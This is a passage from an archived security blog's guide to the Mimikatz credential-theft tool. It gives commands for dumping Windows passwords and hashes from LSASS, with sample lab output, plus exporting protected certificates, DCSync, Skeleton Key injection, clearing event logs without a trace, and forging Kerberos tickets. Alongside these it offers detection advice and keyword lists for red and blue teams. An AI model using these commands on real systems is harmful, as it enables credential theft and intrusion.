{
	"id": "f644a9e4-779e-4d89-93d1-1ad0c8643f3b",
	"created_at": "2026-04-06T00:07:06.348682Z",
	"updated_at": "2026-04-10T03:21:34.994934Z",
	"deleted_at": null,
	"sha1_hash": "dc49dc8138e64eca0a4774053cc9b3c3244adf43",
	"title": "Mimikatz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9529521,
	"plain_text": "Mimikatz\r\nPublished: 2015-09-20 · Archived: 2026-04-05 20:10:11 UTC\r\nUnofficial Guide to Mimikatz \u0026 Command Reference\r\nMimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017\r\nPage last updated: February 17th, 2018\r\nTHIS PAGE IS ARCHIVED AND NO LONGER BEING UPDATED\r\nCheck out  The Mimikatz Missing Manual.\r\nIntroduction:\r\nIt seems like many people on both sides of the fence, Red \u0026 Blue, aren’t familiar with most of Mimikatz’s\r\ncapabilities, so I put together this information on all the available commands I could find. I plan to update as I can\r\nwith additional content about the most useful commands. This way both Red \u0026 Blue teams better understand the\r\nfull capability and are better able to secure the enterprises they are hired to protect.\r\nI developed this reference after speaking with a lot of people, hired to both defend and attack networks, I learned\r\nthat outside of a few of the mot frequently used Mimikatz commands, not many knew about the full capability of\r\nMimikatz. This page details as best as possible what each command is, how it works, the rights required to run it,\r\nthe parameters (required \u0026 optional), as well as screenshots and additional context (where possible). There are\r\nseveral I haven’t delved fully into, but expect to in the near future. While I will continue to post articles to\r\nADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as\r\npossible. With that noted, this page will never be as up-to-date as the Mimikatz github. The best Mimikatz\r\ndocumentation is the source code. \r\nThis information is provided to help organizations better understand Mimikatz capability and is not to be used for\r\nunlawful activity. Do NOT use Mimikatz on computers you don’t own or have been allowed/approved to. In other\r\nwords, don’t pen-test/red-team systems with Mimikatz without a “get out of jail free card”.\r\nThis page and all content contained within is not to be reproduced in whole or part without express written\r\nconsent by this page’s author.\r\nI did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 1 of 79\n\nusing Mimikatz, reading the source code, conversations with Benjamin, his Twitter, blog \u0026 GitHub pages, and my\r\nown work/research.\r\nAny errors on this page are my own only. Send comments/kudus here.\r\nMany thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved\r\nthe security of Windows, especially Windows 10.\r\nMimikatz Overview:\r\nMimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to\r\nbe the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the\r\nauthor of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at\r\nleast on his blog. The Mimikatz GitHub repository is in English and includes useful information on command\r\nusage.\r\nMimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more\r\nabout Windows credentials (and as a Proof of Concept). There are two optional components that provide\r\nadditional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth\r\npackage/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often\r\ndebug rights in order to perform certain actions and interact with the LSASS process (depending on the action\r\nrequested). The Mimikatz.exe contains, or at least should contain, all capability noted there.\r\nMimikatz capability can be leveraged by compiling and running your own version, running the Mimikatz\r\nexecutable, leveraging the MetaSploit script, the official Invoke-Mimikatz PowerShell version, or one of the\r\ndozen of Mimikatz PowerShell variants (I happen to be partial to PowerShell Empire, because Empire is\r\nawesome!).\r\nThe Mimikatz source code and release binaries are available on GitHub and is licensed under Creative Commons\r\nwith the following detail:\r\nYou are free to:\r\n*  Share — copy and redistribute the material in any medium or format\r\n*  Adapt — remix, transform, and build upon the material\r\n*  for any purpose, even commercially.\r\nThe licensor cannot revoke these freedoms as long as you follow the license terms.\r\nAttribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made.\r\nYou may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.\r\nNo additional restrictions — You may not apply legal terms or technological measures that legally restrict others\r\nfrom doing anything the license permits.\r\nMimikatz Author(s):\r\nBenjamin DELPY gentilkiwi , you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at]\r\ngentilkiwi.com )\r\nDCSync function in lsadump module was co-written with Vincent LE TOUX, you contact him by mail (\r\nvincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 2 of 79\n\n“Official” Mimikatz Links:\r\nMimikatz GitHub Location (Source Code)\r\nMimikatz Releases (includes binaries)\r\nMimikatz GitHub Wiki (Documentation, some of which is reproduced here)\r\nGentilKiwi Blog (much of it is in French, use Chrome/other for translation)\r\nMimikatz \u0026 Credentials:\r\nAfter a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem\r\nService, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t\r\nprompted each time resource access is requested. The credential data may include Kerberos tickets, NTLM\r\npassword hashes, LM password hashes (if the password is \u003c15 characters, depending on Windows OS version and\r\npatch level), and even clear-text passwords (to support WDigest and SSP authentication among others. While you\r\ncan prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD\r\ndatabase), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server\r\n2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with\r\nWindows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory.\r\nThis functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in\r\nkb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following\r\nregistry key needs to be set to “0” (Digest Disabled):\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\r\n“UseLogonCredential”(DWORD)\r\nThis registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable\r\nDigest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows\r\nfrom Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a\r\n“UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems\r\nmay indicate a problem.\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 3 of 79\n\nNote that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously\r\nupdated with new capability to be run remotely. This include running Mimikatz remotely against a remote system\r\nto dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature\r\nto grab password data for any Active Directory account in the domain remotely against a DC without any\r\nMimikatz code being run on the DC (it uses Microsoft’s Domain Controller official replication APIs, once the\r\ncorrect rights are attained).\r\nAvailable Credentials by OS:\r\nBenjamin Delpy posted an Excel chart on OneDrive (no longer available, but shown below) that shows what type\r\nof credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have\r\nenhanced protection mechanisms reducing the amount and type of credentials kept in memory.\r\n(Click image to embiggen)\r\nPowerShell \u0026 Mimikatz:\r\nThe majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework)\r\nthrough the “Invoke-Mimikatz” PowerShell script (written by Joseph Bialek) which “leverages Mimikatz 2.0 and\r\nInvoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things\r\nsuch as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework\r\nis now hosted in the “PowerShellMafia” GitHub repository.\r\nWhat gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the\r\nscript) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and\r\nexecuted from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the\r\nappropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other\r\nsystems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote\r\nsystem.\r\nInvoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL\r\nencoded elements (32bit \u0026 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on\r\nupdating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire\r\nversion of Invoke-Mimikatz is usually kept up to date.\r\nUse mimikatz to dump credentials out of LSASS:  Invoke-Mimikatz -DumpCreds\r\nUse mimikatz to export all private certificates (even if they are marked non-exportable): Invoke-Mimikatz –\r\nDumpCerts\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 4 of 79\n\nElevate privilege to have debug rights on remote computer: Invoke-Mimikatz -Command “privilege::debug\r\nexit” -ComputerName “computer1”\r\nThe Invoke-Mimikatz “Command” parameter enables Invoke-Mimikatz to run custom Mimikatz commands.\r\nDefenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz.\r\nDetecting Mimikatz:\r\nThere are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since\r\nMimikatz’s source code is on GitHub, anyone with Visual Studio can compile their own version. I built my own\r\nversion of Mimikatz called “kitikatz” by replacing all instances of “mimikatz” with “kitikatz” and the detection\r\nrate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it.  I then replaced\r\n“Benjamin Delpy” and “gentilkiwi” with the same words, just replacing the e’s with 3’s and the i’s with 1’s. The\r\ndetection rate was still poor (4/54). Windows Defender on my Windows 10 system did not detect it. So, your\r\nmileage will vary regarding detection. While VirusTotal is not the best method to determine AV detection, it is a\r\nrelatively simple method to get some basic numbers.\r\nBenjamin Delpy publishes YARA rules for Mimikatz on the Mimkatz GitHub repository.\r\nRun AntiVirus software with the latest definition files. According to VirusTotal, the mimikatz.exe dated\r\n11/11/2015 (32bit \u0026 64bit) is detected by 35/35 of the AV engines. Renaming the file doesn’t change the\r\nscan results. Note that Benjamin has noted real-world results to be less successful. However, AV will\r\nusually flag the known bad files. AntiVirus is part of foundational security – the first layer in “defense in\r\ndepth”.\r\nMimikatz (as of October) activates attached BusyLights. [implemented in Mimikatz version 2.0 alpha\r\n20151008 (oe.eo) edition]\r\nLeverage security software to identify processes that interact with LSASS. Security software that monitors\r\nfor process injection may also be able to regularly detect Mimikatz use.\r\nHoneyTokens/HoneyHashes involves placing special credentials in memory on a number of computers in\r\nthe enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out.\r\nthis requires some sort of push method as well as placing credentials that are attractive to an attacker. In\r\ntheory, this could detect credential theft and use in the environment.\r\nIf the WDIGEST registry key\r\n(HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest) is\r\nsupposed to be set to “0” in the enterprise to prevent “clear-text” passwords from being stored in LSASS\r\nand there are systems where it was switched to “1”, this may be indicative of credential theft activity. This\r\nregistry key is worth monitoring in your environment since an attacker may wish to set it to 0 to enable\r\nDigest password support which forces “clear-text” passwords to be placed in LSASS on any version of\r\nWindows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well).\r\nForged Kerberos ticket detection is covered on this page I published in early 2015. These methods can\r\ndetect Golden Tickets, Silver Tickets, and Trust Tickets. I also have information on how to detect MS14-\r\n068 Kerberos vulnerability exploitation.\r\nEnable LSA Protection on all Windows versions in the enterprise that supports it. This prevents Mimikatz\r\nfrom working “out-of-the-box” and requires use of the Mimikatz driver which logs events when it interacts\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 5 of 79\n\nwith LSASS.\r\nThere are new/updated events starting with Windows 10 and Windows Server 2016 to potentially detect\r\nMimikatz use:\r\nAdded a default process SACL to LSASS.exe\r\nIn Windows 10, a default process SACL was added to LSASS.exe to log processes attempting to access\r\nLSASS.exe. The SACL is L”S:(AU;SAFA;0x0010;;;WD)”. You can enable this under Advanced Audit\r\nPolicy Configuration\\Object Access\\Audit Kernel Object.\r\nThis can help identify attacks that steal credentials from the memory of a process.\r\nMimikatz \u0026 LSA Protection:\r\nWindows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling\r\nLSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should\r\nmake some noise in the event logs):\r\nThe LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local\r\nand remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional\r\nprotection for the LSA to prevent reading memory and code injection by non-protected processes. This provides\r\nadded security for the credentials that the LSA stores and manages.\r\nEnabling LSA protection:\r\n1. Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at:\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa and Set the value of the registry\r\nkey to: “RunAsPPL”=dword:00000001.\r\n2. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click\r\nRegistry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In\r\nthe Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to\r\nSYSTEM\\CurrentControlSet\\Control\\Lsa.  In the Value name box, type RunAsPPL. In the Value type box,\r\nclick the REG_DWORD. In the Value data box, type 00000001.Click OK.\r\nLSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this\r\nwith a driver (“!+”).\r\nDetecting Invoke-Mimikatz:\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 6 of 79\n\nEnsure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better\r\nlogging features, especially PowerShell v5.\r\nEnable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative\r\nTemplates, Windows Components, and Windows PowerShell,Turn on Module Logging. Enter “*” and\r\nclick OK. This will log all PowerShell activity including all PowerShell modules.\r\nPowerShell activity will be logged to the PowerShell Operational Log. Push or pull these events to a\r\ncentral logging server (via Windows Event Forwarding or similar) or SIEM.\r\nParse PowerShell events for the following:\r\n“System.Reflection.AssemblyName”\r\n“System.Reflection.Emit.AssemblyBuilderAccess “\r\n“System.Runtime.InteropServices.MarshalAsAttribute”\r\n“TOKEN_PRIVILEGES”\r\n “SE_PRIVILEGE_ENABLED“\r\nNote: While it may be possible to identify Mimikatz usage by alerting on “mimikatz”, “Delpy”, or “gentilkiwi”, a\r\n“sophisticated” attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords.\r\nDetecting Offensive PowerShell Tools:\r\nMany PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging.\r\n“GetDelegateForFunctionPointer”\r\n“System.Reflection.AssemblyName“\r\n“System.Reflection.Emit.AssemblyBuilderAccess“\r\n“System.Management.Automation.WindowsErrorReporting”\r\n“MiniDumpWriteDump”\r\n“TOKEN_IMPERSONATE”\r\n“TOKEN_DUPLICATE”\r\n“TOKEN_ADJUST_PRIVILEGES”\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 7 of 79\n\n“TOKEN_PRIVILEGES”\r\n“Sneaky” Mimikatz Execution:\r\nCasey Smith (@subtee \u0026 blog) has done a LOT of work showing how application whitelisting is not the panacea\r\nmany believe it to be. Despite that, application whitelisting is a solid layer in a defense in depth strategy.\r\nCasey also has come up with many creative and sneaky ways to execute Mimikatz.\r\nExecute Mimikatz Inside of RegSvcs or RegAsm – .NET utilities Proof of Concept\r\nMimikatz packed \u0026 hidden in an image file\r\nDownloads and Executes Mimikatz In Memory From GitHub\r\nNote: Subtee has discontinued his GitHub repo, so these links no longer work and have been removed.\r\nMost Popular Mimikatz Commands:\r\nHere are just some of the most popular Mimikatz command and related functionality.\r\nCRYPTO::Certificates – list/export certificates\r\nKERBEROS::Golden – create golden/silver/trust tickets\r\nKERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required\r\nsince it only displays the current user’s tickets.Similar to functionality of “klist”.\r\nKERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket\r\n(golden/silver/trust).\r\nLSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run\r\ncode on DC.\r\nLSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject).\r\nUse to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file.\r\nAlso used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”\r\nLSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option\r\nconnects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.\r\nThis is used to dump all local credentials on a Windows computer.\r\nLSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).\r\nDumps trust keys (passwords) for all associated trusts (domain/forest).\r\nMISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second\r\nvalue is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.\r\nMISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials.\r\nMISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user\r\nauthentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as\r\ntheir usual password.\r\nPRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz\r\ncommands).\r\nSEKURLSA::Ekeys – list Kerberos encryption keys\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 8 of 79\n\nSEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and\r\ncomputer account)\r\nSEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data\r\nSEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently\r\nlogged on user and computer credentials.\r\nSEKURLSA::Pth – Pass- theHash and Over-Pass-the-Hash\r\nSEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including\r\nservices running under the context of a user account and the local computer’s AD computer account.\r\nUnlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa\r\ncan access tickets of others sessions (users).\r\nTOKEN::List – list all tokens of the system\r\nTOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a\r\ndomain admin token on the box\r\nTOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials.\r\nADSecurity Mimikatz Posts:\r\nAll posts mentioning Mimikatz: ADSecurity.org Mimikatz Posts\r\nMimikatz and Active Directory Kerberos Attacks\r\nDump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync\r\nHow Attackers Use Kerberos Silver Tickets to Exploit Systems\r\nMimikatz DCSync Usage, Exploitation, and Detection\r\nSneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)\r\nSneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)\r\nKerberos Golden Tickets are Now More Golden\r\nIt’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts\r\nDetecting Mimikatz Use\r\nMimikatz Command Guide:\r\nMimikatz can be executed in interactive mode by simply running “Mimikatz.exe” or pass it a command and exit\r\n(example: ‘Mimikatz “kerberos::list” exit’). Invoke-Mimikatz does not have an interactive mode.\r\nMimikatz can be used to pass commands from the command line to Mimikatz for processing in order which is\r\nuseful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending “exit” exits Mimikatz after the last\r\ncommand is executed (do this so Mimikatz exits gracefully).\r\nPS C:\\temp\\mimikatz\u003e .\\mimikatz \"privilege::debug\" \"sekurlsa::logonpasswords\" exit\r\n.#####. mimikatz 2.0 alpha (x64) release \"Kiwi en C\" (Nov 13 2015 00:44:32)\r\n .## ^ ##.\r\n ## / \\ ## /* * *\r\n ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 9 of 79\n\n'## v ##'\r\nhttp://blog.gentilkiwi.com/mimikatz(oe.eo)\r\n '#####'with 17 modules * * */\r\nmimikatz(commandline) # privilege::debug\r\n Privilege '20' OK\r\nmimikatz(commandline) # sekurlsa::logonpasswords\r\nAuthentication Id : 0 ; 646260 (00000000:0009dc74)\r\n Session : RemoteInteractive from 2\r\n User Name : adsadministrator\r\n Domain : ADSECLAB\r\n Logon Server : ADSDC03\r\n Logon Time : 11/27/2015 11:41:27 AM\r\n SID : S-1-5-21-1581655573-3923512380-696647894-500\r\n msv :\r\n [00000003] Primary\r\n * Username : ADSAdministrator\r\n * Domain : ADSECLAB\r\n * NTLM : 5164b7a0fda365d56739954bbbc23835\r\n * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f\r\n [00010000] CredentialKeys\r\n * NTLM : 5164b7a0fda365d56739954bbbc23835\r\n * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f\r\n tspkg :\r\n wdigest :\r\n * Username : ADSAdministrator\r\n * Domain : ADSECLAB\r\n * Password : (null)\r\n kerberos :\r\n * Username : adsadministrator\r\n * Domain : LAB.ADSECURITY.ORG\r\n * Password : (null)\r\n ssp : KO\r\nThe interactive mode provides a “Mimikatz console” where commands can be entered and executed in real-time:\r\nPS C:\\temp\\mimikatz\u003e .\\mimikatz\r\n.#####. mimikatz 2.0 alpha (x64) release \"Kiwi en C\" (Nov 13 2015 00:44:32)\r\n .## ^ ##.\r\n ## / \\ ## /* * *\r\n ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 10 of 79\n\n'## v ##'\r\nhttp://blog.gentilkiwi.com/mimikatz(oe.eo)\r\n '#####'with 17 modules * * */\r\nmimikatz # privilege::debug\r\n Privilege '20' OK\r\nmimikatz # sekurlsa::logonpasswords\r\nAuthentication Id : 0 ; 646260 (00000000:0009dc74)\r\n Session : RemoteInteractive from 2\r\n User Name : adsadministrator\r\n Domain : ADSECLAB\r\n Logon Server : ADSDC03\r\n Logon Time : 11/27/2015 11:41:27 AM\r\n SID : S-1-5-21-1581655573-3923512380-696647894-500\r\n msv :\r\n [00000003] Primary\r\n * Username : ADSAdministrator\r\n * Domain : ADSECLAB\r\n * NTLM : 5164b7a0fda365d56739954bbbc23835\r\n * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f\r\n [00010000] CredentialKeys\r\n * NTLM : 5164b7a0fda365d56739954bbbc23835\r\n * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f\r\n tspkg :\r\n wdigest :\r\n * Username : ADSAdministrator\r\n * Domain : ADSECLAB\r\n * Password : (null)\r\n kerberos :\r\n * Username : adsadministrator\r\n * Domain : LAB.ADSECURITY.ORG\r\n * Password : (null)\r\n ssp : KO\r\n credman :\r\nMimikatz Command Reference:\r\nMimikatz Version History\r\nMimikatz Modules:\r\nBUSYLIGHT\r\nCRYPTO\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 11 of 79\n\nCRYPTO::Certificates\r\nDPAPI\r\nEVENT\r\nIIS\r\nKERBEROS\r\nGolden Tickets\r\nSilver Tickets\r\nTrust Tickets\r\nKERBEROS::PTT\r\nLSADUMP\r\nDCSync\r\nDCShadow\r\nLSADUMP::LSA\r\nLSADUMP::NetSync\r\nLSADUMP::SAM\r\nLSADUMP::Trust\r\nMISC\r\nMINESWEEPER\r\nNET\r\nPRIVILEGE\r\nPRIVILEGE::Debug\r\nPROCESS\r\nRPC\r\nSERVICE\r\nSEKURLSA\r\nSEKURLSA::Kerberos\r\nSEKURLSA::Krbtgt\r\nSEKURLSA::LogonPasswords\r\nSEKURLSA::Pth\r\nSID\r\nSTANDARD\r\nSYSENV\r\nTOKEN\r\nTOKEN::Elevate\r\nTOKEN::Elevate /domainadmin\r\nTS\r\nVAULT\r\nNOTE: Any item marked “experimental” should only be used in test environments.\r\nVersion\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 12 of 79\n\nRun Version to get the Mimikatz version and additional information about the Windows system, such as the\r\nversion and if Credential Manager is running.\r\nBUSYLIGHT\r\nThe BUSYLIGHT Mimikatz module provides additional information for and control of connected BusyLights.\r\nBUSYLIGHT::List\r\nBUSYLIGHT::Off\r\nBUSYLIGHT::Single\r\nBUSYLIGHT::Status\r\nBUSYLIGHT::Test\r\nCRYPTO\r\nThe CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions\r\n(CryptoAPI).\r\nTypical use is to export certificates that aren’t marked as “exportable.”\r\nCRYPTO::CAPI– (experimental) Patch CryptoAPI layer for easy export\r\nCRYPTO::Certificates – list/export certificates\r\nCarlos Perez (aka DarkOperator) has a great blog post on using Mimikatz to export certificates.\r\nThis command lists certificates and properties of theirs keys. It can export certificates too. Typically requires\r\n“privilege::debug”\r\n/systemstore – optional – the system store that must be used (default:\r\nCERT_SYSTEM_STORE_CURRENT_USER)\r\n/store – optional – the store that must be used to list/export certificates (default: My) – full list with\r\ncrypto::stores\r\n/export – optional – export all certificates to files (public parts in DER, private parts in PFX files –\r\npassword protected with: mimikatz)\r\nBenjamin’s comments on CRYPTO:Certificates:\r\nCRYPTO::CertToHW – try to export a software CA to a crypto (virtual)hardware\r\nCRYPTO::CNG – (experimental) Patch CNG service for easy export (patches “KeyIso” service)\r\nCRYPTO::Extract – [experimental] Extract keys from CAPI RSA/AES provider\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 13 of 79\n\nCRYPTO::Hash – hash a password with optional username\r\nCRYPTO::Keys– list/export keys containers\r\nCRYPTO::Providers – list cryptographic providers\r\nCRYPTO::SC – List smartcard readers\r\nCRYPTO::SCAuth– Create an authentication certificate (smartcard like) from a CA\r\nCRYPTO::Stores – list cryptographic stores\r\n/systemstore – optional – the system store that must be used to list stores (default:\r\nCERT_SYSTEM_STORE_CURRENT_USER)\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 14 of 79\n\nStore Options:\r\nCERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER\r\nCERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY\r\nCERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE\r\nCERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY\r\nCERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE\r\nCERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE\r\nCERT_SYSTEM_STORE_USERS or USERS\r\nCERT_SYSTEM_STORE_SERVICES or SERVICES\r\nCRYPTO::System – Describe a Windows System Certificate (file, TODO:registry or hive).\r\nDPAPI\r\nThe DPAPI Mimikatz module provides capability to extract Windows stored (and protected) credential data using\r\nDPAPI.  DPAPI is the official Windows method to protect (encrypt) local data (usually passwords).\r\nStarting with Microsoft® Windows® 2000, the operating system began to provide a data protection\r\napplication-programming interface (API). This Data Protection API (DPAPI) is a pair of function calls\r\nthat provide operating system-level data protection services to user and system processes. By operating\r\nsystem-level, we mean a service that is provided by the operating system itself and does not require any\r\nadditional libraries. By data protection, we mean a service that provides confidentiality of data by using\r\nencryption. Because data protection is part of the operating system, every application can now secure\r\ndata without needing any specific cryptographic code other than the necessary function calls to DPAPI.\r\nThese calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is\r\nan easy-to-use service that will benefit developers who must provide protection for sensitive application\r\ndata, such as passwords and private keys.\r\nDPAPI is a password-based data protection service. It requires a password to provide protection. The\r\ndrawback, of course, is that all protection provided by DPAPI rests on the password provided. This is\r\noffset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES algorithm, and\r\nstrong keys, which we’ll cover in more detail later. Because DPAPI is focused on providing protection\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 15 of 79\n\nfor users and requires a password to provide this protection, it logically uses the user’s logon password\r\nfor protection.\r\nThere has been some work done previously regarding attacking DPAPI:\r\nReversing DPAPI and Stealing Windows Secrets Offline\r\nDPAPI Secrets. Security analysis and data recovery in DPAPI\r\nBenjamin Delpy has an Excel spreadsheet on OneDrive which lists Windows locations that may have stored\r\ncredentials – view the spreadsheet online.\r\nDPAPI::Blob – Unprotect a DPAPI blob with API or Masterkey\r\nDPAPI:Cache\r\nDPAPI::CAPI – CAPI key test\r\nDPAPI::Chrome – Chrome test\r\nDPAPI::CNG – CNG key test\r\nDPAPI::Cred – CRE test\r\nDPAPI::CredHist – Configure a Credhist file\r\nDPAPI::MasterKey – Configure a Masterkey file, unprotect (key depending)\r\nDPAPI::Protect – Protect data using DPAPI\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 16 of 79\n\nDPAPI::Vault – VAULT test\r\nDPAPI::WIFI – WIFI test (XML profile required – reference Ben’s spreadsheet)\r\nDPAPI::WWAN – WWAN test (XML profile required – reference Ben’s spreadsheet)\r\nEVENT\r\nEVENT::Clear – Clear an event log\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 17 of 79\n\nEVENT:::Drop – (experimental) Patch Events service to avoid new events\r\nNote:\r\nRun privilege::debug then event::drop to patch the event log.  Then run Event::Clear to clear the event log without\r\nany log cleared event (1102) being logged.\r\nIIS\r\nIIS XML Config module\r\nIIS::AppHost\r\nKERBEROS\r\nThe KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API.\r\nNo special rights are required for the commands in this module.\r\nKERBEROS::Ask – request TGS tickets\r\nKERBEROS::Clist – list tickets in MIT/Heimdall ccache\r\nKERBEROS::Golden – create golden/silver/trust tickets\r\nThe capability of this command is based on the password hash type retrieved.\r\nType Requirement Scope\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 18 of 79\n\nGolden KRBTGT hash Domain/Forest\r\nSilver Service hash Service\r\nTrust Trust hash\r\nDomain/Forest -\u003e Domain/Forest\r\n(based on account access)\r\nGolden Ticket\r\nA Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.\r\nA Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any\r\ngroup in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.\r\nSince the Golden 